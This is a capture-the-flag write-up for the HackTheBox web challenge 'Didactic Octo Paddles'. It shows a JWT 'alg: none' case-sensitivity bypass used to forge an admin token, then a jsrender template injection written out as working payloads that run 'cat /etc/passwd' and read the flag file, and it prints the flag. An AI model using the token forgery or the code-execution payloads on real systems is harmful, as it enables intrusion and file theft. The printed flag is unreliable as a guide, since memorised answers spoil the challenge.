# Didactic Octo Paddles

Initial page is a login screen.

![Login prompt](./1-initial-login-screen.png)

## Investigation

There is a `/register` endpoint that can be used to create an account.

![Register an account](./2-registering-an-account.png)

Once logged in as a regular user there is a store front.

![Logged in as a regular user](./3-logged-in-user.png)

Attempting to access the `/admin` endpoint results in an error message.

![Attempting admin endpoint](./4-admin-endpoint.png)

Next I turn my attention to the `middleware/AdminMiddleware.js` file to understand how the admin endpoint checks authorization.

## Becoming an Admin

![Reviewing the code for AdminMiddleware](./5-audit-AdminMiddleware.png)

Notice that line 13 checks if `decoded.header.alg` is equal to `none`. However, this check returns False if none uses capital letters (ie `NoNe`).

It's possible to take the current session and forge a new one using `python jwt_tool <existing JWT token> -X a` to obtain a token with alg=`nOnE`.

![Forging my own JWT admin token](./6-jwt-tool-output.png)

I then use Burp Decoder to update the new JWT token and change `"id":2` to `"id":1`.

![Modifying the JWT token to id=1](./7-changing-jwt-id-to-1.png)

With this new token I am able to interact with the website as an administrator. This also allows me to access the `/admin` endpoint that was inaccessible before.

The admin page shows a list of accounts registered with the website.

## Obtaining the Flag

Next I continue reviewing the sourcecode and take interest in `views/admin.jsrender`. The span field offers an opportunity for Server-Side Template Injection (SSTI).

![Sourcecode containing SSTI](./8-review-admin-jsrender.png)

I try registering a new user to see if we can read `/etc/passwd`. This will help confirm if this field is exploitable.

### Confirming User Name SSTI
```
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```

After reloading the page and reviewing the sourcecode I confirm SSTI is working. Now I create one more user to obtain the flag.

### Flag Solution Payload

```
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}
```

![Completing the challenge](./10-obtaining-the-flag.png)

## Flag

`HTB{Pr3_C0MP111N6_W17HOU7_P4DD13804rD1N6_5K1115}`

